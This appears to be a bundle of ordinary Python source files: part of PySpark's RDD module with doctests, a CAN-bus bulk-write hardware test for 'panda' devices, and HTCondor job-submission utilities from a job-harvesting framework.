either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = self._can_spill()
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
def _can_spill(self):
return self.ctx._conf.get("spark.shuffle.spill", "True").lower() == "true"
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)\
if spill else InMemoryMerger(agg)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)], False)
return values.collect()
def _to_java_object_rdd(self):
""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
bulk_write_test.py
|
#!/usr/bin/env python3
import time
import threading
from panda import Panda
# The TX buffers on pandas is 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
def flood_tx(panda):
print('Sending!')
msg = b"\xaa"*4
packet = [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
panda.can_send_many(packet)
print(f"Done sending {3*NUM_MESSAGES_PER_BUS} messages!")
if __name__ == "__main__":
serials = Panda.list()
if len(serials) != 2:
raise Exception("Connect two pandas to perform this test!")
sender = Panda(serials[0])
receiver = Panda(serials[1])
sender.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
receiver.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
# Start transmisson
threading.Thread(target=flood_tx, args=(sender,)).start()
# Receive as much as we can in a few second time period
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 2 or len(rx) > old_len:
old_len = len(rx)
rx.extend(receiver.can_recv())
print(f"Received {len(rx)} messages")
|
htcondor_utils.py
|
#=== Imports ===================================================
import re
import time
import threading
import random
import multiprocessing
import tempfile
import functools
import traceback
import xml.etree.ElementTree as ET
try:
import subprocess32 as subprocess
except Exception:
import subprocess
try:
from threading import get_ident
except ImportError:
from thread import get_ident
import six
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvesterconfig import harvester_config
from pandaharvester.harvestercore.core_utils import SingletonWithID
from pandaharvester.harvestercore.fifos import SpecialFIFOBase
# condor python or command api
try:
import htcondor
except ImportError:
CONDOR_API = 'command'
else:
CONDOR_API = 'python'
#===============================================================
#=== Definitions ===============================================
# logger
baseLogger = core_utils.setup_logger('htcondor_utils')
# module level lock
moduleLock = threading.Lock()
# List of job ads required
CONDOR_JOB_ADS_LIST = [
'ClusterId', 'ProcId', 'JobStatus', 'LastJobStatus',
'JobStartDate', 'EnteredCurrentStatus', 'ExitCode',
'HoldReason', 'LastHoldReason', 'RemoveReason',
'harvesterWorkerID',
]
# harvesterID
harvesterID = harvester_config.master.harvester_id
#===============================================================
#=== Functions =================================================
def synchronize(func):
"""
synchronize decorator
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with moduleLock:
return func(*args, **kwargs)
return wrapper
def _runShell(cmd):
"""
Run shell function
"""
cmd = str(cmd)
p = subprocess.Popen(cmd.split(), shell=False, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdOut, stdErr = p.communicate()
retCode = p.returncode
return (retCode, stdOut, stdErr)
def condor_job_id_from_workspec(workspec):
"""
Generate condor job id with schedd host from workspec
"""
batchid_str = str(workspec.batchID)
# backward compatibility if workspec.batchID does not contain ProcId
if '.' not in batchid_str:
batchid_str += '.0'
return '{0}#{1}'.format(workspec.submissionHost, batchid_str)
def get_host_batchid_map(workspec_list):
"""
Get a dictionary of submissionHost: list of batchIDs from workspec_list
return {submissionHost_1: {batchID_1_1, ...}, submissionHost_2: {...}, ...}
"""
host_batchid_map = {}
for workspec in workspec_list:
host = workspec.submissionHost
batchid = workspec.batchID
if batchid is None:
continue
batchid_str = str(batchid)
# backward compatibility if workspec.batchID does not contain ProcId
if '.' not in batchid_str:
batchid_str += '.0'
try:
host_batchid_map[host].append(batchid_str)
except KeyError:
host_batchid_map[host] = [batchid_str]
return host_batchid_map
def get_batchid_from_job(job_ads_dict):
"""
Get batchID string from condor job dict
"""
batchid = '{0}.{1}'.format(job_ads_dict['ClusterId'], job_ads_dict['ProcId'])
return batchid
def get_job_id_tuple_from_batchid(batchid):
"""
Get tuple (ClusterId, ProcId) from batchID string
"""
batchid_str_list = str(batchid).split('.')
clusterid = batchid_str_list[0]
procid = batchid_str_list[1]
if not procid:
procid = 0
return (clusterid, procid)
# def jdl_to_map(jdl):
# """
# Transform jdl into dictionary
# The "queue" line (e.g. "queue 1") will be omitted
# """
# # FIXME: not containing "+"
# ret_map = {}
# for line in jdl.split('\n'):
# match = re.search('^(.+) = (.+)$', line)
# if match:
# ret_map[match(1)] = match(2)
# return ret_map
def condor_submit_process(mp_queue, host, jdl_map_list):
"""
Function for new process to submit condor
"""
# initialization
errStr = ''
batchIDs_list = []
# parse schedd and pool name
condor_schedd, condor_pool = None, None
if host in ('LOCAL', 'None'):
tmpLog.debug('submissionHost is {0}, treated as local schedd. Skipped'.format(host))
else:
try:
condor_schedd, condor_pool = host.split(',')[0:2]
except ValueError:
tmpLog.error('Invalid submissionHost: {0} . Skipped'.format(host))
# get schedd
try:
if condor_pool:
collector = htcondor.Collector(condor_pool)
else:
collector = htcondor.Collector()
if condor_schedd:
scheddAd = collector.locate(htcondor.DaemonTypes.Schedd, condor_schedd)
else:
scheddAd = collector.locate(htcondor.DaemonTypes.Schedd)
schedd = htcondor.Schedd(scheddAd)
except Exception as e:
errStr = 'create condor collector and schedd failed; {0}: {1}'.format(e.__class__.__name__, e)
else:
submit_obj = htcondor.Submit()
try:
with schedd.transaction() as txn:
# TODO: Currently spool is not supported in htcondor.Submit ...
submit_result = submit_obj.queue_with_itemdata(txn, 1, iter(jdl_map_list))
clusterid = submit_result.cluster()
first_proc = submit_result.first_proc()
num_proc = submit_result.num_procs()
batchIDs_list.extend(['{0}.{1}'.format(clusterid, procid)
for procid in range(first_proc, first_proc + num_proc)])
except RuntimeError as e:
errStr = 'submission failed; {0}: {1}'.format(e.__class__.__name__, e)
mp_queue.put((batchIDs_list, errStr))
#===============================================================
#=== Classes ===================================================
# Condor queue cache fifo
class CondorQCacheFifo(six.with_metaclass(SingletonWithID, SpecialFIFOBase)):
global_lock_id = -1
def __init__(self, target, *args, **kwargs):
name_suffix = target.split('.')[0]
name_suffix = re.sub('-', '_', name_suffix)
self.titleName = 'CondorQCache_{0}'.format(name_suffix)
SpecialFIFOBase.__init__(self)
def lock(self, score=None):
lock_key = format(int(random.random() * 2**32), 'x')
if score is None:
score = time.time()
retVal = self.putbyid(self.global_lock_id, lock_key, score)
if retVal:
return lock_key
return None
def unlock(self, key=None, force=False):
peeked_tuple = self.peekbyid(id=self.global_lock_id)
if peeked_tuple.score is None or peeked_tuple.item is None:
return True
elif force or self.decode(peeked_tuple.item) == key:
self.delete([self.global_lock_id])
return True
else:
return False
# Condor client
class CondorClient(object):
@classmethod
def renew_session_and_retry(cls, func):
"""
If RuntimeError, call renew_session and retry
"""
# FIXME: currently hard-coded
to_retry = True
# Wrapper
def wrapper(self, *args, **kwargs):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.renew_session_if_error')
func_name = func.__name__
try:
self.schedd
except AttributeError:
if self.lock.acquire(False):
is_renewed = self.renew_session()
self.lock.release()
if not is_renewed:
errStr = 'failed to communicate with {0}'.format(self.submissionHost)
tmpLog.error(errStr)
tmpLog.debug('got RuntimeError: {0}'.format(e))
raise Exception(errStr)
try:
ret = func(self, *args, **kwargs)
except RuntimeError as e:
tmpLog.debug('got RuntimeError: {0}'.format(e))
if self.lock.acquire(False):
is_renewed = self.renew_session()
self.lock.release()
if is_renewed:
if to_retry:
tmpLog.debug('condor session renewed. Retrying {0}'.format(func_name))
ret = func(self, *args, **kwargs)
else:
tmpLog.debug('condor session renewed')
raise
else:
tmpLog.error('failed to renew condor session')
raise
else:
tmpLog.debug('another thread is renewing condor session; skipped...')
raise
tmpLog.debug('done')
return ret
return wrapper
def __init__(self, submissionHost, *args, **kwargs):
self.submissionHost = submissionHost
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.__init__')
# Initialize
